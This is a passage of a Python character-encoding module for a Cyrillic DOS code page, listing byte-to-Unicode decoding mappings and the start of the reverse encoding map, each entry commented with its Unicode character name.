0x00a3: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x00a4: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00a5: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x00a6: 0x0434, # CYRILLIC SMALL LETTER DE
0x00a7: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x00a8: 0x0435, # CYRILLIC SMALL LETTER IE
0x00a9: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x00aa: 0x0444, # CYRILLIC SMALL LETTER EF
0x00ab: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x00ac: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00ad: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00b6: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x00b7: 0x0438, # CYRILLIC SMALL LETTER I
0x00b8: 0x0418, # CYRILLIC CAPITAL LETTER I
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00be: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x043a, # CYRILLIC SMALL LETTER KA
0x00c7: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x00a4, # CURRENCY SIGN
0x00d0: 0x043b, # CYRILLIC SMALL LETTER EL
0x00d1: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x00d2: 0x043c, # CYRILLIC SMALL LETTER EM
0x00d3: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x00d4: 0x043d, # CYRILLIC SMALL LETTER EN
0x00d5: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x00d6: 0x043e, # CYRILLIC SMALL LETTER O
0x00d7: 0x041e, # CYRILLIC CAPITAL LETTER O
0x00d8: 0x043f, # CYRILLIC SMALL LETTER PE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x00de: 0x044f, # CYRILLIC SMALL LETTER YA
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00e1: 0x0440, # CYRILLIC SMALL LETTER ER
0x00e2: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x00e3: 0x0441, # CYRILLIC SMALL LETTER ES
0x00e4: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x00e5: 0x0442, # CYRILLIC SMALL LETTER TE
0x00e6: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x00e7: 0x0443, # CYRILLIC SMALL LETTER U
0x00e8: 0x0423, # CYRILLIC CAPITAL LETTER U
0x00e9: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00ea: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x00eb: 0x0432, # CYRILLIC SMALL LETTER VE
0x00ec: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x00ed: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00ee: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x00ef: 0x2116, # NUMERO SIGN
0x00f0: 0x00ad, # SOFT HYPHEN
0x00f1: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00f2: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x00f3: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00f4: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x00f5: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00f6: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x00f7: 0x044d, # CYRILLIC SMALL LETTER E
0x00f8: 0x042d, # CYRILLIC CAPITAL LETTER E
0x00f9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00fa: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x00fb: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00fc: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x00fd: 0x00a7, # SECTION SIGN
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
u'\x00' # 0x0000 -> NULL
u'\x01' # 0x0001 -> START OF HEADING
u'\x02' # 0x0002 -> START OF TEXT
u'\x03' # 0x0003 -> END OF TEXT
u'\x04' # 0x0004 -> END OF TRANSMISSION
u'\x05' # 0x0005 -> ENQUIRY
u'\x06' # 0x0006 -> ACKNOWLEDGE
u'\x07' # 0x0007 -> BELL
u'\x08' # 0x0008 -> BACKSPACE
u'\t' # 0x0009 -> HORIZONTAL TABULATION
u'\n' # 0x000a -> LINE FEED
u'\x0b' # 0x000b -> VERTICAL TABULATION
u'\x0c' # 0x000c -> FORM FEED
u'\r' # 0x000d -> CARRIAGE RETURN
u'\x0e' # 0x000e -> SHIFT OUT
u'\x0f' # 0x000f -> SHIFT IN
u'\x10' # 0x0010 -> DATA LINK ESCAPE
u'\x11' # 0x0011 -> DEVICE CONTROL ONE
u'\x12' # 0x0012 -> DEVICE CONTROL TWO
u'\x13' # 0x0013 -> DEVICE CONTROL THREE
u'\x14' # 0x0014 -> DEVICE CONTROL FOUR
u'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x0016 -> SYNCHRONOUS IDLE
u'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x0018 -> CANCEL
u'\x19' # 0x0019 -> END OF MEDIUM
u'\x1a' # 0x001a -> SUBSTITUTE
u'\x1b' # 0x001b -> ESCAPE
u'\x1c' # 0x001c -> FILE SEPARATOR
u'\x1d' # 0x001d -> GROUP SEPARATOR
u'\x1e' # 0x001e -> RECORD SEPARATOR
u'\x1f' # 0x001f -> UNIT SEPARATOR
u' ' # 0x0020 -> SPACE
u'!' # 0x0021 -> EXCLAMATION MARK
u'"' # 0x0022 -> QUOTATION MARK
u'#' # 0x0023 -> NUMBER SIGN
u'$' # 0x0024 -> DOLLAR SIGN
u'%' # 0x0025 -> PERCENT SIGN
u'&' # 0x0026 -> AMPERSAND
u"'" # 0x0027 -> APOSTROPHE
u'(' # 0x0028 -> LEFT PARENTHESIS
u')' # 0x0029 -> RIGHT PARENTHESIS
u'*' # 0x002a -> ASTERISK
u'+' # 0x002b -> PLUS SIGN
u',' # 0x002c -> COMMA
u'-' # 0x002d -> HYPHEN-MINUS
u'.' # 0x002e -> FULL STOP
u'/' # 0x002f -> SOLIDUS
u'0' # 0x0030 -> DIGIT ZERO
u'1' # 0x0031 -> DIGIT ONE
u'2' # 0x0032 -> DIGIT TWO
u'3' # 0x0033 -> DIGIT THREE
u'4' # 0x0034 -> DIGIT FOUR
u'5' # 0x0035 -> DIGIT FIVE
u'6' # 0x0036 -> DIGIT SIX
u'7' # 0x0037 -> DIGIT SEVEN
u'8' # 0x0038 -> DIGIT EIGHT
u'9' # 0x0039 -> DIGIT NINE
u':' # 0x003a -> COLON
u';' # 0x003b -> SEMICOLON
u'<' # 0x003c -> LESS-THAN SIGN
u'=' # 0x003d -> EQUALS SIGN
u'>' # 0x003e -> GREATER-THAN SIGN
u'?' # 0x003f -> QUESTION MARK
u'@' # 0x0040 -> COMMERCIAL AT
u'A' # 0x0041 -> LATIN CAPITAL LETTER A
u'B' # 0x0042 -> LATIN CAPITAL LETTER B
u'C' # 0x0043 -> LATIN CAPITAL LETTER C
u'D' # 0x0044 -> LATIN CAPITAL LETTER D
u'E' # 0x0045 -> LATIN CAPITAL LETTER E
u'F' # 0x0046 -> LATIN CAPITAL LETTER F
u'G' # 0x0047 -> LATIN CAPITAL LETTER G
u'H' # 0x0048 -> LATIN CAPITAL LETTER H
u'I' # 0x0049 -> LATIN CAPITAL LETTER I
u'J' # 0x004a -> LATIN CAPITAL LETTER J
u'K' # 0x004b -> LATIN CAPITAL LETTER K
u'L' # 0x004c -> LATIN CAPITAL LETTER L
u'M' # 0x004d -> LATIN CAPITAL LETTER M
u'N' # 0x004e -> LATIN CAPITAL LETTER N
u'O' # 0x004f -> LATIN CAPITAL LETTER O
u'P' # 0x0050 -> LATIN CAPITAL LETTER P
u'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
u'R' # 0x0052 -> LATIN CAPITAL LETTER R
u'S' # 0x0053 -> LATIN CAPITAL LETTER S
u'T' # 0x0054 -> LATIN CAPITAL LETTER T
u'U' # 0x0055 -> LATIN CAPITAL LETTER U
u'V' # 0x0056 -> LATIN CAPITAL LETTER V
u'W' # 0x0057 -> LATIN CAPITAL LETTER W
u'X' # 0x0058 -> LATIN CAPITAL LETTER X
u'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
u'Z' # 0x005a -> LATIN CAPITAL LETTER Z
u'[' # 0x005b -> LEFT SQUARE BRACKET
u'\\' # 0x005c -> REVERSE SOLIDUS
u']' # 0x005d -> RIGHT SQUARE BRACKET
u'^' # 0x005e -> CIRCUMFLEX ACCENT
u'_' # 0x005f -> LOW LINE
u'`' # 0x0060 -> GRAVE ACCENT
u'a' # 0x0061 -> LATIN SMALL LETTER A
u'b' # 0x0062 -> LATIN SMALL LETTER B
u'c' # 0x0063 -> LATIN SMALL LETTER C
u'd' # 0x0064 -> LATIN SMALL LETTER D
u'e' # 0x0065 -> LATIN SMALL LETTER E
u'f' # 0x0066 -> LATIN SMALL LETTER F
u'g' # 0x0067 -> LATIN SMALL LETTER G
u'h' # 0x0068 -> LATIN SMALL LETTER H
u'i' # 0x0069 -> LATIN SMALL LETTER I
u'j' # 0x006a -> LATIN SMALL LETTER J
u'k' # 0x006b -> LATIN SMALL LETTER K
u'l' # 0x006c -> LATIN SMALL LETTER L
u'm' # 0x006d -> LATIN SMALL LETTER M
u'n' # 0x006e -> LATIN SMALL LETTER N
u'o' # 0x006f -> LATIN SMALL LETTER O
u'p' # 0x0070 -> LATIN SMALL LETTER P
u'q' # 0x0071 -> LATIN SMALL LETTER Q
u'r' # 0x0072 -> LATIN SMALL LETTER R
u's' # 0x0073 -> LATIN SMALL LETTER S
u't' # 0x0074 -> LATIN SMALL LETTER T
u'u' # 0x0075 -> LATIN SMALL LETTER U
u'v' # 0x0076 -> LATIN SMALL LETTER V
u'w' # 0x0077 -> LATIN SMALL LETTER W
u'x' # 0x0078 -> LATIN SMALL LETTER X
u'y' # 0x0079 -> LATIN SMALL LETTER Y
u'z' # 0x007a -> LATIN SMALL LETTER Z
u'{' # 0x007b -> LEFT CURLY BRACKET
u'|' # 0x007c -> VERTICAL LINE
u'}' # 0x007d -> RIGHT CURLY BRACKET
u'~' # 0x007e -> TILDE
u'\x7f' # 0x007f -> DELETE
u'\u0452' # 0x0080 -> CYRILLIC SMALL LETTER DJE
u'\u0402' # 0x0081 -> CYRILLIC CAPITAL LETTER DJE
u'\u0453' # 0x0082 -> CYRILLIC SMALL LETTER GJE
u'\u0403' # 0x0083 -> CYRILLIC CAPITAL LETTER GJE
u'\u0451' # 0x0084 -> CYRILLIC SMALL LETTER IO
u'\u0401' # 0x0085 -> CYRILLIC CAPITAL LETTER IO
u'\u0454' # 0x0086 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0404' # 0x0087 -> CYRILLIC CAPITAL LETTER UKRAINIAN IE
u'\u0455' # 0x0088 -> CYRILLIC SMALL LETTER DZE
u'\u0405' # 0x0089 -> CYRILLIC CAPITAL LETTER DZE
u'\u0456' # 0x008a -> CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0406' # 0x008b -> CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0457' # 0x008c -> CYRILLIC SMALL LETTER YI
u'\u0407' # 0x008d -> CYRILLIC CAPITAL LETTER YI
u'\u0458' # 0x008e -> CYRILLIC SMALL LETTER JE
u'\u0408' # 0x008f -> CYRILLIC CAPITAL LETTER JE
u'\u0459' # 0x0090 -> CYRILLIC SMALL LETTER LJE
u'\u0409' # 0x0091 -> CYRILLIC CAPITAL LETTER LJE
u'\u045a' # 0x0092 -> CYRILLIC SMALL LETTER NJE
u'\u040a' # 0x0093 -> CYRILLIC CAPITAL LETTER NJE
u'\u045b' # 0x0094 -> CYRILLIC SMALL LETTER TSHE
u'\u040b' # 0x0095 -> CYRILLIC CAPITAL LETTER TSHE
u'\u045c' # 0x0096 -> CYRILLIC SMALL LETTER KJE
u'\u040c' # 0x0097 -> CYRILLIC CAPITAL LETTER KJE
u'\u045e' # 0x0098 -> CYRILLIC SMALL LETTER SHORT U
u'\u040e' # 0x0099 -> CYRILLIC CAPITAL LETTER SHORT U
u'\u045f' # 0x009a -> CYRILLIC SMALL LETTER DZHE
u'\u040f' # 0x009b -> CYRILLIC CAPITAL LETTER DZHE
u'\u044e' # 0x009c -> CYRILLIC SMALL LETTER YU
u'\u042e' # 0x009d -> CYRILLIC CAPITAL LETTER YU
u'\u044a' # 0x009e -> CYRILLIC SMALL LETTER HARD SIGN
u'\u042a' # 0x009f -> CYRILLIC CAPITAL LETTER HARD SIGN
u'\u0430' # 0x00a0 -> CYRILLIC SMALL LETTER A
u'\u0410' # 0x00a1 -> CYRILLIC CAPITAL LETTER A
u'\u0431' # 0x00a2 -> CYRILLIC SMALL LETTER BE
u'\u0411' # 0x00a3 -> CYRILLIC CAPITAL LETTER BE
u'\u0446' # 0x00a4 -> CYRILLIC SMALL LETTER TSE
u'\u0426' # 0x00a5 -> CYRILLIC CAPITAL LETTER TSE
u'\u0434' # 0x00a6 -> CYRILLIC SMALL LETTER DE
u'\u0414' # 0x00a7 -> CYRILLIC CAPITAL LETTER DE
u'\u0435' # 0x00a8 -> CYRILLIC SMALL LETTER IE
u'\u0415' # 0x00a9 -> CYRILLIC CAPITAL LETTER IE
u'\u0444' # 0x00aa -> CYRILLIC SMALL LETTER EF
u'\u0424' # 0x00ab -> CYRILLIC CAPITAL LETTER EF
u'\u0433' # 0x00ac -> CYRILLIC SMALL LETTER GHE
u'\u0413' # 0x00ad -> CYRILLIC CAPITAL LETTER GHE
u'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\u2591' # 0x00b0 -> LIGHT SHADE
u'\u2592' # 0x00b1 -> MEDIUM SHADE
u'\u2593' # 0x00b2 -> DARK SHADE
u'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
u'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
u'\u0445' # 0x00b5 -> CYRILLIC SMALL LETTER HA
u'\u0425' # 0x00b6 -> CYRILLIC CAPITAL LETTER HA
u'\u0438' # 0x00b7 -> CYRILLIC SMALL LETTER I
u'\u0418' # 0x00b8 -> CYRILLIC CAPITAL LETTER I
u'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
u'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
u'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
u'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
u'\u0439' # 0x00bd -> CYRILLIC SMALL LETTER SHORT I
u'\u0419' # 0x00be -> CYRILLIC CAPITAL LETTER SHORT I
u'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
u'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
u'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
u'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
u'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
u'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
u'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
u'\u043a' # 0x00c6 -> CYRILLIC SMALL LETTER KA
u'\u041a' # 0x00c7 -> CYRILLIC CAPITAL LETTER KA
u'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
u'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
u'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
u'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
u'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
u'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
u'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
u'\xa4' # 0x00cf -> CURRENCY SIGN
u'\u043b' # 0x00d0 -> CYRILLIC SMALL LETTER EL
u'\u041b' # 0x00d1 -> CYRILLIC CAPITAL LETTER EL
u'\u043c' # 0x00d2 -> CYRILLIC SMALL LETTER EM
u'\u041c' # 0x00d3 -> CYRILLIC CAPITAL LETTER EM
u'\u043d' # 0x00d4 -> CYRILLIC SMALL LETTER EN
u'\u041d' # 0x00d5 -> CYRILLIC CAPITAL LETTER EN
u'\u043e' # 0x00d6 -> CYRILLIC SMALL LETTER O
u'\u041e' # 0x00d7 -> CYRILLIC CAPITAL LETTER O
u'\u043f' # 0x00d8 -> CYRILLIC SMALL LETTER PE
u'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
u'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
u'\u2588' # 0x00db -> FULL BLOCK
u'\u2584' # 0x00dc -> LOWER HALF BLOCK
u'\u041f' # 0x00dd -> CYRILLIC CAPITAL LETTER PE
u'\u044f' # 0x00de -> CYRILLIC SMALL LETTER YA
u'\u2580' # 0x00df -> UPPER HALF BLOCK
u'\u042f' # 0x00e0 -> CYRILLIC CAPITAL LETTER YA
u'\u0440' # 0x00e1 -> CYRILLIC SMALL LETTER ER
u'\u0420' # 0x00e2 -> CYRILLIC CAPITAL LETTER ER
u'\u0441' # 0x00e3 -> CYRILLIC SMALL LETTER ES
u'\u0421' # 0x00e4 -> CYRILLIC CAPITAL LETTER ES
u'\u0442' # 0x00e5 -> CYRILLIC SMALL LETTER TE
u'\u0422' # 0x00e6 -> CYRILLIC CAPITAL LETTER TE
u'\u0443' # 0x00e7 -> CYRILLIC SMALL LETTER U
u'\u0423' # 0x00e8 -> CYRILLIC CAPITAL LETTER U
u'\u0436' # 0x00e9 -> CYRILLIC SMALL LETTER ZHE
u'\u0416' # 0x00ea -> CYRILLIC CAPITAL LETTER ZHE
u'\u0432' # 0x00eb -> CYRILLIC SMALL LETTER VE
u'\u0412' # 0x00ec -> CYRILLIC CAPITAL LETTER VE
u'\u044c' # 0x00ed -> CYRILLIC SMALL LETTER SOFT SIGN
u'\u042c' # 0x00ee -> CYRILLIC CAPITAL LETTER SOFT SIGN
u'\u2116' # 0x00ef -> NUMERO SIGN
u'\xad' # 0x00f0 -> SOFT HYPHEN
u'\u044b' # 0x00f1 -> CYRILLIC SMALL LETTER YERU
u'\u042b' # 0x00f2 -> CYRILLIC CAPITAL LETTER YERU
u'\u0437' # 0x00f3 -> CYRILLIC SMALL LETTER ZE
u'\u0417' # 0x00f4 -> CYRILLIC CAPITAL LETTER ZE
u'\u0448' # 0x00f5 -> CYRILLIC SMALL LETTER SHA
u'\u0428' # 0x00f6 -> CYRILLIC CAPITAL LETTER SHA
u'\u044d' # 0x00f7 -> CYRILLIC SMALL LETTER E
u'\u042d' # 0x00f8 -> CYRILLIC CAPITAL LETTER E
u'\u0449' # 0x00f9 -> CYRILLIC SMALL LETTER SHCHA
u'\u0429' # 0x00fa -> CYRILLIC CAPITAL LETTER SHCHA
u'\u0447' # 0x00fb -> CYRILLIC SMALL LETTER CHE
u'\u0427' # 0x00fc -> CYRILLIC CAPITAL LETTER CHE
u'\xa7' # 0x00fd -> SECTION SIGN
u'\u25a0' # 0x00fe -> BLACK SQUARE
u'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a4: 0x00cf, # CURRENCY SIGN
0x00a7: 0x00fd, # SECTION SIGN
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ad: 0x00f0, # SOFT HYPHEN
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x0401: 0x0085, # CYRILLIC CAPITAL LETTER IO
0x0402: 0x0081, # CYRILLIC CAPITAL LETTER DJE
0x0403: 0x0083, # CYRILLIC CAPITAL LETTER GJE
0x0404: 0x0087, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x0405: 0x0089, # CYRILLIC CAPITAL LETTER DZE
0x0406: 0x008b, # CYRILLIC CAPITAL LETTER BYELORUSSIAN-UKRAINIAN I
0x0407: 0x008d, # CYRILLIC CAPITAL LETTER YI
0x0408: 0x008f, # CYRILLIC CAPITAL LETTER JE
0x0409: 0x0091, # CYRILLIC CAPITAL LETTER LJE
0x040a: 0x0093, # CYRILLIC CAPITAL LETTER NJE
0x040b: 0x0095, # CYRILLIC CAPITAL LETTER TSHE
0x040c: 0x0097, # CYRILLIC CAPITAL LETTER KJE
0x040e: 0x0099, # CYRILLIC CAPITAL LETTER SHORT U
0x040f: 0x009b, # CYRILLIC CAPITAL LETTER DZHE
0x0410: 0x00a1, # CYRILLIC CAPITAL LETTER A
0x0411: 0x00a3, # CYRILLIC CAPITAL LETTER BE
